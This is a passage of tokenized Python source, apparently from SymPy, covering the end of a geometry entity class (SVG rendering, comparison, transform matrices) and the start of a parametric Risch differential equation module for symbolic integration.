"""<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _repr_svg_ ( self ) : <EOL> """<STR_LIT>""" <EOL> from sympy . core . evalf import N <EOL> try : <EOL> bounds = self . bounds <EOL> except ( NotImplementedError , TypeError ) : <EOL> return None <EOL> svg_top = '''<STR_LIT>''' <EOL> xmin , ymin , xmax , ymax = map ( N , bounds ) <EOL> if xmin == xmax and ymin == ymax : <EOL> xmin , ymin , xmax , ymax = xmin - <NUM_LIT> , ymin - <NUM_LIT> , xmax + <NUM_LIT> , ymax + <NUM_LIT> <EOL> else : <EOL> expand = <NUM_LIT:0.1> <EOL> widest_part = max ( [ xmax - xmin , ymax - ymin ] ) <EOL> expand_amount = widest_part * expand <EOL> xmin -= expand_amount <EOL> ymin -= expand_amount <EOL> xmax += expand_amount <EOL> ymax += expand_amount <EOL> dx = xmax - xmin <EOL> dy = ymax - ymin <EOL> width = min ( [ max ( [ <NUM_LIT> , dx ] ) , <NUM_LIT> ] ) <EOL> height = min ( [ max ( [ <NUM_LIT> , dy ] ) , <NUM_LIT> ] ) <EOL> scale_factor = <NUM_LIT:1.> if max ( width , height ) == <NUM_LIT:0> else max ( dx , dy ) / max ( width , height ) <EOL> try : <EOL> svg = self . _svg ( scale_factor ) <EOL> except ( NotImplementedError , TypeError ) : <EOL> return None <EOL> view_box = "<STR_LIT>" . format ( xmin , ymin , dx , dy ) <EOL> transform = "<STR_LIT>" . format ( ymax + ymin ) <EOL> svg_top = svg_top . format ( view_box , width , height ) <EOL> return svg_top + ( <EOL> '<STR_LIT>' <EOL> ) . format ( transform , svg ) <EOL> def __ne__ ( self , o ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( o ) <EOL> def __radd__ ( self , a ) : <EOL> return a . __add__ ( self ) <EOL> def __rsub__ ( self , a ) : <EOL> return a . __sub__ ( self ) <EOL> def __rmul__ ( self , a ) : <EOL> return a . __mul__ ( self ) <EOL> def __rdiv__ ( self , a ) : <EOL> return a . __div__ ( self ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> from sympy . printing import sstr <EOL> return type ( self ) . __name__ + sstr ( self . args ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return type ( self ) . __name__ + repr ( self . args ) <EOL> def __cmp__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> n1 = self . __class__ . __name__ <EOL> n2 = other . __class__ . __name__ <EOL> c = ( n1 > n2 ) - ( n1 < n2 ) <EOL> if not c : <EOL> return <NUM_LIT:0> <EOL> i1 = - <NUM_LIT:1> <EOL> for cls in self . __class__ . __mro__ : <EOL> try : <EOL> i1 = ordering_of_classes . index ( cls . __name__ ) <EOL> break <EOL> except ValueError : <EOL> i1 = - <NUM_LIT:1> <EOL> if i1 == - <NUM_LIT:1> : <EOL> return c <EOL> i2 = - <NUM_LIT:1> <EOL> for cls in other . __class__ . __mro__ : <EOL> try : <EOL> i2 = ordering_of_classes . index ( cls . __name__ ) <EOL> break <EOL> except ValueError : <EOL> i2 = - <NUM_LIT:1> <EOL> if i2 == - <NUM_LIT:1> : <EOL> return c <EOL> return ( i1 > i2 ) - ( i1 < i2 ) <EOL> def __contains__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if type ( self ) == type ( other ) : <EOL> return self == other <EOL> raise NotImplementedError ( ) <EOL> def _eval_subs ( self , old , new ) : <EOL> from sympy . geometry . point import Point , Point3D <EOL> if is_sequence ( old ) or is_sequence ( new ) : <EOL> if isinstance ( self , Point3D ) : <EOL> old = Point3D ( old ) <EOL> new = Point3D ( new ) <EOL> else : <EOL> old = Point ( old ) <EOL> new = Point ( new ) <EOL> return self . _subs ( old , new ) <EOL> class GeometrySet ( GeometryEntity , Set ) : <EOL> """<STR_LIT>""" <EOL> def _contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) and other . is_FiniteSet : <EOL> return all ( self . __contains__ ( i ) for i in other ) <EOL> return self . __contains__ ( other ) <EOL> def _union ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . sets import Union , FiniteSet <EOL> if o . is_FiniteSet : <EOL> other_points = [ p for p in o if not self . _contains ( p ) ] <EOL> if len ( other_points ) == len ( o ) : <EOL> return None <EOL> return Union ( self , FiniteSet ( * other_points ) ) <EOL> if self . _contains ( o ) : <EOL> return self <EOL> return None <EOL> def _intersect ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . sets import Set , FiniteSet , Union <EOL> from sympy . geometry import Point <EOL> try : <EOL> inter = self . intersection ( o ) <EOL> except NotImplementedError : <EOL> return None <EOL> points = FiniteSet ( * [ p for p in inter if isinstance ( p , Point ) ] ) <EOL> non_points = [ p for p in inter if not isinstance ( p , Point ) ] <EOL> return Union ( * ( non_points + [ points ] ) ) <EOL> def translate ( x , y ) : <EOL> """<STR_LIT>""" <EOL> rv = eye ( <NUM_LIT:3> ) <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:0> ] = x <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:1> ] = y <EOL> return rv <EOL> def scale ( x , y , pt = None ) : <EOL> """<STR_LIT>""" <EOL> rv = eye ( <NUM_LIT:3> ) <EOL> rv [ <NUM_LIT:0> , <NUM_LIT:0> ] = x <EOL> rv [ <NUM_LIT:1> , <NUM_LIT:1> ] = y <EOL> if pt : <EOL> from sympy . geometry . point import Point <EOL> pt = Point ( pt ) <EOL> tr1 = translate ( * ( - pt ) . args ) <EOL> tr2 = translate ( * pt . args ) <EOL> return tr1 * rv * tr2 <EOL> return rv <EOL> def rotate ( th ) : <EOL> """<STR_LIT>""" <EOL> s = sin ( th ) <EOL> rv = eye ( <NUM_LIT:3> ) * cos ( th ) <EOL> rv [ <NUM_LIT:0> , <NUM_LIT:1> ] = s <EOL> rv [ <NUM_LIT:1> , <NUM_LIT:0> ] = - s <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> return rv </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import Dummy , ilcm , Add , Mul , Pow , S <EOL> from sympy . matrices import Matrix , zeros , eye <EOL> from sympy . solvers import solve <EOL> from sympy . polys import Poly , lcm , cancel , sqf_list <EOL> from sympy . integrals . risch import ( gcdex_diophantine , frac_in , derivation , <EOL> NonElementaryIntegralException , residue_reduce , splitfactor , <EOL> residue_reduce_derivation , DecrementLevel , recognize_log_derivative ) <EOL> from sympy . integrals . rde import ( order_at , order_at_oo , weak_normalizer , <EOL> bound_degree , spde , solve_poly_rde ) <EOL> from sympy . core . compatibility import reduce , range <EOL> from sympy . utilities . misc import debug <EOL> def prde_normal_denom ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> dn , ds = splitfactor ( fd , DE ) <EOL> Gas , Gds = list ( zip ( * G ) ) <EOL> gd = reduce ( lambda i , j : i . lcm ( j ) , Gds , Poly ( <NUM_LIT:1> , DE . t ) ) <EOL> en , es = splitfactor ( gd , DE ) <EOL> p = dn . gcd ( en ) <EOL> h = en . gcd ( en . diff ( DE . t ) ) . quo ( p . gcd ( p . diff ( DE . t ) ) ) <EOL> a = dn * h <EOL> c = a * h <EOL> ba = a * fa - dn * derivation ( h , DE ) * fd <EOL> ba , bd = ba . cancel ( fd , include = True ) <EOL> G = [ ( c * A ) . cancel ( D , include = True ) for A , D in G ] <EOL> return ( a , ( ba , bd ) , G , h ) <EOL> def real_imag ( ba , bd , gen ) : <EOL> """<STR_LIT>""" <EOL> bd = bd . as_poly ( gen ) . as_dict ( ) <EOL> ba = ba . as_poly ( gen ) . as_dict ( ) <EOL> denom_real = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:0> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:2> else <NUM_LIT:0> for key , value in bd . items ( ) ] <EOL> denom_imag = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:1> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:3> else <NUM_LIT:0> for key , value in bd . items ( ) ] <EOL> bd_real = sum ( r for r in denom_real ) <EOL> bd_imag = sum ( r for r in denom_imag ) <EOL> num_real = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:0> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:2> else <NUM_LIT:0> for key , value in ba . items ( ) ] <EOL> num_imag = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:1> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:3> else <NUM_LIT:0> for key , value in ba . items ( ) ] <EOL> ba_real = sum ( r for r in num_real ) <EOL> ba_imag = sum ( r for r in num_imag ) <EOL> ba = ( ( ba_real * bd_real + ba_imag * bd_imag ) . as_poly ( gen ) , ( ba_imag * bd_real - ba_real * bd_imag ) . as_poly ( gen ) ) <EOL> bd = ( bd_real * bd_real + bd_imag * bd_imag ) . as_poly ( gen ) <EOL> return ( ba [ <NUM_LIT:0> ] , ba [ <NUM_LIT:1> ] , bd ) <EOL> def prde_special_denom ( a , ba , bd , G , DE , case = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if case == '<STR_LIT>' : <EOL> case = DE . case <EOL> if case == '<STR_LIT>' : <EOL> p = Poly ( DE . t , DE . t ) <EOL> elif case == '<STR_LIT>' : <EOL> p = Poly ( DE . t ** <NUM_LIT:2> + <NUM_LIT:1> , DE . t ) <EOL> elif case in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> B = ba . quo ( bd ) <EOL> return ( a , B , G , Poly ( <NUM_LIT:1> , DE . t ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % case ) <EOL> nb = order_at ( ba , p , DE . t ) - order_at ( bd , p , DE . t ) <EOL> nc = min ( [ order_at ( Ga , p , DE . t ) - order_at ( Gd , p , DE . t ) for Ga , Gd in G ] ) <EOL> n = min ( <NUM_LIT:0> , nc - min ( <NUM_LIT:0> , nb ) ) <EOL> if not nb : <EOL> if case == '<STR_LIT>' : <EOL> dcoeff = DE . d . quo ( Poly ( DE . t , DE . t ) ) <EOL> with DecrementLevel ( DE ) : <EOL> alphaa , alphad = frac_in ( - ba . eval ( <NUM_LIT:0> ) / bd . eval ( <NUM_LIT:0> ) / a . eval ( <NUM_LIT:0> ) , DE . t ) <EOL> etaa , etad = frac_in ( dcoeff , DE . t ) <EOL> A = parametric_log_deriv ( alphaa , alphad , etaa , etad , DE ) <EOL> if A is not None : <EOL> a , m , z = A <EOL> if a == <NUM_LIT:1> : <EOL> n = min ( n , m ) <EOL> elif case == '<STR_LIT>' : <EOL> dcoeff = DE . d . quo ( Poly ( DE . t ** <NUM_LIT:2> + <NUM_LIT:1> , DE . t ) ) <EOL> with DecrementLevel ( DE ) : <EOL> betaa , alphaa , alphad = real_imag ( ba , bd * a , DE . t ) <EOL> betad = alphad <EOL> etaa , etad = frac_in ( dcoeff , DE . t ) <EOL> if recognize_log_derivative ( <NUM_LIT:2> * betaa , betad , DE ) : <EOL> A = parametric_log_deriv ( alphaa , alphad , etaa , etad , DE ) <EOL> B = parametric_log_deriv ( betaa , betad , etaa , etad , DE ) <EOL> if A is not None and B is not None : <EOL> a , s , z = A <EOL> if a == <NUM_LIT:1> : <EOL> n = min ( n , s / <NUM_LIT:2> ) <EOL> N = max ( <NUM_LIT:0> , - nb ) <EOL> pN = p ** N <EOL> pn = p ** - n <EOL> A = a * pN <EOL> B = ba * pN . quo ( bd ) + Poly ( n , DE . t ) * a * derivation ( p , DE ) . quo ( p ) * pN <EOL> G = [ ( Ga * pN * pn ) . cancel ( Gd , include = True ) for Ga , Gd in G ] <EOL> h = pn <EOL> return ( A , B , G , h ) <EOL> def prde_linear_constraints ( a , b , G , DE ) : <EOL> """<STR_LIT>""" <EOL> m = len ( G ) <EOL> Gns , Gds = list ( zip ( * G ) ) <EOL> d = reduce ( lambda i , j : i . lcm ( j ) , Gds ) <EOL> d = Poly ( d , field = True ) <EOL> Q = [ ( ga * ( d ) . quo ( gd ) ) . div ( d ) for ga , gd in G ] <EOL> if not all ( [ ri . is_zero for _ , ri in Q ] ) : <EOL> N = max ( [ ri . degree ( DE . t ) for _ , ri in Q ] ) <EOL> M = Matrix ( N + <NUM_LIT:1> , m , lambda i , j : Q [ j ] [ <NUM_LIT:1> ] . nth ( i ) ) <EOL> else : <EOL> M = Matrix ( ) <EOL> qs , _ = list ( zip ( * Q ) ) <EOL> return ( qs , M ) <EOL> def constant_system ( A , u , DE ) : <EOL> """<STR_LIT>""" <EOL> if not A : <EOL> return A , u <EOL> Au = A . row_join ( u ) <EOL> Au = Au . rref ( simplify = cancel ) [ <NUM_LIT:0> ] <EOL> Au = Au . applyfunc ( cancel ) <EOL> A , u = Au [ : , : - <NUM_LIT:1> ] , Au [ : , - <NUM_LIT:1> ] <EOL> for j in range ( A . cols ) : <EOL> for i in range ( A . rows ) : <EOL> if A [ i , j ] . has ( * DE . T ) : <EOL> Ri = A [ i , : ] <EOL> Rm1 = Ri . applyfunc ( lambda x : derivation ( x , DE , basic = True ) / <EOL> derivation ( A [ i , j ] , DE , basic = True ) ) <EOL> Rm1 = Rm1 . applyfunc ( cancel ) <EOL> um1 = cancel ( derivation ( u [ i ] , DE , basic = True ) / <EOL> derivation ( A [ i , j ] , DE , basic = True ) ) <EOL> for s in range ( A . rows ) : <EOL> Asj = A [ s , j ] <EOL> A . row_op ( s , lambda r , jj : cancel ( r - Asj * Rm1 [ jj ] ) ) <EOL> u . row_op ( s , lambda r , jj : cancel ( r - Asj * um1 ) ) <EOL> A = A . col_join ( Rm1 ) <EOL> u = u . col_join ( Matrix ( [ um1 ] ) ) <EOL> return ( A , u ) <EOL> def prde_spde ( a , b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> R , Z = list ( zip ( * [ gcdex_diophantine ( b , a , qi ) for qi in Q ] ) ) <EOL> A = a <EOL> B = b + derivation ( a , DE ) <EOL> Qq = [ zi - derivation ( ri , DE ) for ri , zi in zip ( R , Z ) ] <EOL> R = list ( R ) <EOL> n1 = n - a . degree ( DE . t ) <EOL> return ( A , B , Qq , R , n1 ) <EOL> def prde_no_cancel_b_large ( b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> db = b . degree ( DE . t ) <EOL> m = len ( Q ) <EOL> H = [ Poly ( <NUM_LIT:0> , DE . t ) ] * m <EOL> for N in range ( n , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> for i in range ( m ) : <EOL> si = Q [ i ] . nth ( N + db ) / b . LC ( ) <EOL> sitn = Poly ( si * DE . t ** N , DE . t ) <EOL> H [ i ] = H [ i ] + sitn <EOL> Q [ i ] = Q [ i ] - derivation ( sitn , DE ) - b * sitn <EOL> if all ( qi . is_zero for qi in Q ) : <EOL> dc = - <NUM_LIT:1> <EOL> M = zeros ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> else : <EOL> dc = max ( [ qi . degree ( t ) for qi in Q ] ) <EOL> M = Matrix ( dc + <NUM_LIT:1> , m , lambda i , j : Q [ j ] . nth ( i ) ) <EOL> A , u = constant_system ( M , zeros ( dc + <NUM_LIT:1> , <NUM_LIT:1> ) , DE ) <EOL> c = eye ( m ) <EOL> A = A . row_join ( zeros ( A . rows , m ) ) . col_join ( c . row_join ( - c ) ) <EOL> return ( H , A ) <EOL> def prde_no_cancel_b_small ( b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> m = len ( Q ) <EOL> H = [ Poly ( <NUM_LIT:0> , DE . t ) ] * m <EOL> for N in range ( n , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> for i in range ( m ) : <EOL> si = Q [ i ] . nth ( N + DE . d . degree ( DE . t ) - <NUM_LIT:1> ) / ( N * DE . d . LC ( ) ) <EOL> sitn = Poly ( si * DE . t ** N , DE . t ) <EOL> H [ i ] = H [ i ] + sitn <EOL> Q [ i ] = Q [ i ] - derivation ( sitn , DE ) - b * sitn <EOL> if b . degree ( DE . t ) > <NUM_LIT:0> : <EOL> for i in range ( m ) : <EOL> si = Poly ( Q [ i ] . nth ( b . degree ( DE . t ) ) / b . LC ( ) , DE . t ) <EOL> H [ i ] = H [ i ] + si <EOL> Q [ i ] = Q [ i ] - derivation ( si , DE ) - b * si <EOL> if all ( qi . is_zero for qi in Q ) : <EOL> dc = - <NUM_LIT:1> <EOL> M = Matrix ( ) <EOL> else : <EOL> dc = max ( [ qi . degree ( DE . t ) for qi in Q ] ) <EOL> M = Matrix ( dc + <NUM_LIT:1> , m , lambda i , j : Q [ j ] . nth ( i ) ) <EOL> A , u = constant_system ( M , zeros ( dc + <NUM_LIT:1> , <NUM_LIT:1> ) , DE ) <EOL> c = eye ( m ) <EOL> A = A . row_join ( zeros ( A . rows , m ) ) . col_join ( c . row_join ( - c ) ) <EOL> return ( H , A ) <EOL> else : <EOL> raise NotImplementedError <EOL> def param_rischDE ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> _ , ( fa , fd ) = weak_normalizer ( fa , fd , DE ) <EOL> a , ( ba , bd ) , G , hn = prde_normal_denom ( ga , gd , G , DE ) <EOL> A , B , G , hs = prde_special_denom ( a , ba , bd , G , DE ) <EOL> g = gcd ( A , B ) <EOL> A , B , G = A . quo ( g ) , B . quo ( g ) , [ gia . cancel ( gid * g , include = True ) for <EOL> gia , gid in G ] <EOL> Q , M = prde_linear_constraints ( A , B , G , DE ) <EOL> M , _ = constant_system ( M , zeros ( M . rows , <NUM_LIT:1> ) , DE ) <EOL> try : <EOL> n = bound_degree ( A , B , G , DE , parametric = True ) <EOL> except NotImplementedError : <EOL> debug ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> n = oo <EOL> A , B , Q , R , n1 = prde_spde ( A , B , Q , n , DE ) <EOL> def limited_integrate_reduce ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> dn , ds = splitfactor ( fd , DE ) <EOL> E = [ splitfactor ( gd , DE ) for _ , gd in G ] <EOL> En , Es = list ( zip ( * E ) ) <EOL> c = reduce ( lambda i , j : i . lcm ( j ) , ( dn , ) + En ) <EOL> hn = c . gcd ( c . diff ( DE . t ) ) <EOL> a = hn <EOL> b = - derivation ( hn , DE ) <EOL> N = <NUM_LIT:0> <EOL> if DE . case in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> hs = reduce ( lambda i , j : i . lcm ( j ) , ( ds , ) + Es ) <EOL> a = hn * hs <EOL> b = - derivation ( hn , DE ) - ( hn * derivation ( hs , DE ) ) . quo ( hs ) <EOL> mu = min ( order_at_oo ( fa , fd , DE . t ) , min ( [ order_at_oo ( ga , gd , DE . t ) for <EOL> ga , gd in G ] ) ) <EOL> N = hn . degree ( DE . t ) + hs . degree ( DE . t ) + max ( <NUM_LIT:0> , <NUM_LIT:1> - DE . d . degree ( DE . t ) - mu ) <EOL> else : <EOL> raise NotImplementedError <EOL> V = [ ( - a * hn * ga ) . cancel ( gd , include = True ) for ga , gd in G ] <EOL> return ( a , b , a , N , ( a * hn * fa ) . cancel ( fd , include = True ) , V ) <EOL> def limited_integrate ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> fa , fd = fa * Poly ( <NUM_LIT:1> / fd . LC ( ) , DE . t ) , fd . monic ( ) <EOL> A , B , h , N , g , V = limited_integrate_reduce ( fa , fd , G , DE ) <EOL> V = [ g ] + V <EOL> g = A . gcd ( B ) <EOL> A , B , V = A . quo ( g ) , B . quo ( g ) , [ via . cancel ( vid * g , include = True ) for <EOL> via , vid in V ] <EOL> Q , M = prde_linear_constraints ( A , B , V , DE ) <EOL> M , _ = constant_system ( M , zeros ( M . rows , <NUM_LIT:1> ) , DE ) <EOL> l = M . nullspace ( ) <EOL> if M == Matrix ( ) or len ( l ) > <NUM_LIT:1> : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif len ( l ) == <NUM_LIT:0> : <EOL> raise NonElementaryIntegralException <EOL> elif len ( l ) == <NUM_LIT:1> : <EOL> if l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . is_zero : <EOL> raise NonElementaryIntegralException <EOL> else : <EOL> l [ <NUM_LIT:0> ] *= <NUM_LIT:1> / l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> C = sum ( [ Poly ( i , DE . t ) * q for ( i , q ) in zip ( l [ <NUM_LIT:0> ] , Q ) ] ) <EOL> B , C , m , alpha , beta = spde ( A , B , C , N , DE ) <EOL> y = solve_poly_rde ( B , C , m , DE ) <EOL> return ( ( alpha * y + beta , h ) , list ( l [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> raise NotImplementedError <EOL> def parametric_log_deriv_heu ( fa , fd , wa , wd , DE , c1 = None ) : <EOL> """<STR_LIT>""" <EOL> c1 = c1 or Dummy ( '<STR_LIT>' ) <EOL> p , a = fa . div ( fd ) <EOL> q , b = wa . div ( wd ) <EOL> B = max ( <NUM_LIT:0> , derivation ( DE . t , DE ) . degree ( DE . t ) - <NUM_LIT:1> ) <EOL> C = max ( p . degree ( DE . t ) , q . degree ( DE . t ) ) <EOL> if q . degree ( DE . t ) > B : <EOL> eqs = [ p . nth ( i ) - c1 * q . nth ( i ) for i in range ( B + <NUM_LIT:1> , C + <NUM_LIT:1> ) ] <EOL> s = solve ( eqs , c1 ) <EOL> if not s or not s [ c1 ] . is_Rational : <EOL> return None <EOL> N , M = s [ c1 ] . as_numer_denom ( ) <EOL> N , M = Poly ( N , DE . t ) , Poly ( M , DE . t ) <EOL> nfmwa = N * fa * wd - M * wa * fd <EOL> nfmwd = fd * wd <EOL> Qv = is_log_deriv_k_t_radical_in_field ( N * fa * wd - M * wa * fd , fd * wd , DE , <EOL> '<STR_LIT>' ) <EOL> if Qv is None : <EOL> return None <EOL> Q , e , v = Qv <EOL> if e != <NUM_LIT:1> : <EOL> return None <EOL> if Q . is_zero or v . is_zero : <EOL> return None <EOL> return ( Q * N , Q * M , v ) <EOL> if p . degree ( DE . t ) > B : <EOL> return None <EOL> c = lcm ( fd . as_poly ( DE . t ) . LC ( ) , wd . as_poly ( DE . t ) . LC ( ) ) <EOL> l = fd . monic ( ) . lcm ( wd . monic ( ) ) * Poly ( c , DE . t ) <EOL> ln , ls = splitfactor ( l , DE ) <EOL> z = ls * ln . gcd ( ln . diff ( DE . t ) ) <EOL> if not z . has ( DE . t ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> u1 , r1 = ( fa * l . quo ( fd ) ) . div ( z ) <EOL> u2 , r2 = ( wa * l . quo ( wd ) ) . div ( z ) <EOL> eqs = [ r1 . nth ( i ) - c1 * r2 . nth ( i ) for i in range ( z . degree ( DE . t ) ) ] <EOL> s = solve ( eqs , c1 ) <EOL> if not s or not s [ c1 ] . is_Rational : <EOL> return None <EOL> M , N = s [ c1 ] . as_numer_denom ( ) <EOL> nfmwa = N . as_poly ( DE . t ) * fa * wd - M . as_poly ( DE . t ) * wa * fd <EOL> nfmwd = fd * wd <EOL> Qv = is_log_deriv_k_t_radical_in_field ( nfmwa , nfmwd , DE ) <EOL> if Qv is None : <EOL> return None <EOL> Q , v = Qv <EOL> if Q . is_zero or v . is_zero : <EOL> return None <EOL> return ( Q * N , Q * M , v ) <EOL> def parametric_log_deriv ( fa , fd , wa , wd , DE ) : <EOL> A = parametric_log_deriv_heu ( fa , fd , wa , wd , DE ) <EOL> return A <EOL> def is_deriv_k ( fa , fd , DE ) : <EOL> """<STR_LIT>""" <EOL> dfa , dfd = fd * ( fd * derivation ( fa , DE ) - fa * derivation ( fd , DE ) ) , fd ** <NUM_LIT:2> * fa <EOL> dfa , dfd = dfa . cancel ( dfd , include = True ) <EOL> if len ( DE . L_K ) + len ( DE . E_K ) != len ( DE . D ) - <NUM_LIT:1> : <EOL> if [ i for i in DE . cases if i == '<STR_LIT>' ] or set ( [ i for i in DE . cases if i == '<STR_LIT>' ] ) - set ( DE . L_K ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> E_part = [ DE . D [ i ] . quo ( Poly ( DE . T [ i ] , DE . T [ i ] ) ) . as_expr ( ) for i in DE . E_K ] <EOL> L_part = [ DE . D [ i ] . as_expr ( ) for i in DE . L_K ] <EOL> lhs = Matrix ( [ E_part + L_part ] ) <EOL> rhs = Matrix ( [ dfa . as_expr ( ) / dfd . as_expr ( ) ] ) <EOL> A , u = constant_system ( lhs , rhs , DE ) <EOL> if not all ( derivation ( i , DE , basic = True ) . is_zero for i in u ) or not A : <EOL> return None <EOL> else : <EOL> if not all ( i . is_Rational for i in u ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> terms = DE . E_args + [ DE . T [ i ] for i in DE . L_K ] <EOL> ans = list ( zip ( terms , u ) ) <EOL> result = Add ( * [ Mul ( i , j ) for i , j in ans ] ) <EOL> argterms = [ DE . T [ i ] for i in DE . E_K ] + DE . L_args <EOL> l = [ ] <EOL> ld = [ ] <EOL> for i , j in zip ( argterms , u ) : <EOL> i , d = i . as_numer_denom ( ) <EOL> icoeff , iterms = sqf_list ( i ) <EOL> l . append ( Mul ( * ( [ Pow ( icoeff , j ) ] + [ Pow ( b , e * j ) for b , e in iterms ] ) ) ) <EOL> dcoeff , dterms = sqf_list ( d ) <EOL> ld . append ( Mul ( * ( [ Pow ( dcoeff , j ) ] + [ Pow ( b , e * j ) for b , e in dterms ] ) ) ) <EOL> const = cancel ( fa . as_expr ( ) / fd . as_expr ( ) / Mul ( * l ) * Mul ( * ld ) ) <EOL> return ( ans , result , const ) <EOL> def is_log_deriv_k_t_radical ( fa , fd , DE , Df = True ) : <EOL> """<STR_LIT>""" <EOL> H = [ ] <EOL> if Df : <EOL> dfa , dfd = ( fd * derivation ( fa , DE ) - fa * derivation ( fd , DE ) ) . cancel ( fd ** <NUM_LIT:2> , <EOL> include = True ) <EOL> else : <EOL> dfa , dfd = fa , fd <EOL> if len ( DE . L_K ) + len ( DE . E_K ) != len ( DE . D ) - <NUM_LIT:1> : <EOL> if [ i for i in DE . cases if i == '<STR_LIT>' ] or set ( [ i for i in DE . cases if i == '<STR_LIT>' ] ) - set ( DE . L_K ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> E_part = [ DE . D [ i ] . quo ( Poly ( DE . T [ i ] , DE . T [ i ] ) ) . as_expr ( ) for i in DE . E_K ] <EOL> L_part = [ DE . D [ i ] . as_expr ( ) for i in DE . L_K ] <EOL> lhs = Matrix ( [ E_part + L_part ] ) <EOL> rhs = Matrix ( [ dfa . as_expr ( ) / dfd . as_expr ( ) ] ) <EOL> A , u = constant_system ( lhs , rhs , DE ) <EOL> if not all ( derivation ( i , DE , basic = True ) . is_zero for i in u ) or not A : <EOL> return None <EOL> else : <EOL> if not all ( i . is_Rational for i in u ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> n = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for i in u ] ) <EOL> u *= n <EOL> terms = [ DE . T [ i ] for i in DE . E_K ] + DE . L_args <EOL> ans = list ( zip ( terms , u ) ) <EOL> result = Mul ( * [ Pow ( i , j ) for i , j in ans ] ) <EOL> argterms = DE . E_args + [ DE . T [ i ] for i in DE . L_K ] <EOL> const = cancel ( fa . as_expr ( ) / fd . as_expr ( ) - <EOL> Add ( * [ Mul ( i , j / n ) for i , j in zip ( argterms , u ) ] ) ) <EOL> return ( ans , result , n , const ) <EOL> def is_log_deriv_k_t_radical_in_field ( fa , fd , DE , case = '<STR_LIT>' , z = None ) : <EOL> """<STR_LIT>""" <EOL> fa , fd = fa . cancel ( fd , include = True ) <EOL> n , s = splitfactor ( fd , DE ) <EOL> if not s . is_one : <EOL> pass <EOL> z = z or Dummy ( '<STR_LIT:z>' ) <EOL> H , b = residue_reduce ( fa , fd , DE , z = z ) <EOL> if not b : <EOL> return None <EOL> roots = [ ( i , i . real_roots ( ) ) for i , _ in H ] <EOL> if not all ( len ( j ) == i . degree ( ) and all ( k . is_Rational for k in j ) for <EOL> i , j in roots ) : <EOL> return None <EOL> respolys , residues = list ( zip ( * roots ) ) or [ [ ] , [ ] ] <EOL> residueterms = [ ( H [ j ] [ <NUM_LIT:1> ] . subs ( z , i ) , i ) for j in range ( len ( H ) ) for <EOL> i in residues [ j ] ] <EOL> p = cancel ( fa . as_expr ( ) / fd . as_expr ( ) - residue_reduce_derivation ( H , DE , z ) ) <EOL> p = p . as_poly ( DE . t ) <EOL> if p is None : <EOL> return None <EOL> if p . degree ( DE . t ) >= max ( <NUM_LIT:1> , DE . d . degree ( DE . t ) ) : <EOL> return None <EOL> if case == '<STR_LIT>' : <EOL> case = DE . case <EOL> if case == '<STR_LIT>' : <EOL> wa , wd = derivation ( DE . t , DE ) . cancel ( Poly ( DE . t , DE . t ) , include = True ) <EOL> with DecrementLevel ( DE ) : <EOL> pa , pd = frac_in ( p , DE . t , cancel = True ) <EOL> wa , wd = frac_in ( ( wa , wd ) , DE . t ) <EOL> A = parametric_log_deriv ( pa , pd , wa , wd , DE ) <EOL> if A is None : <EOL> return None <EOL> n , e , u = A 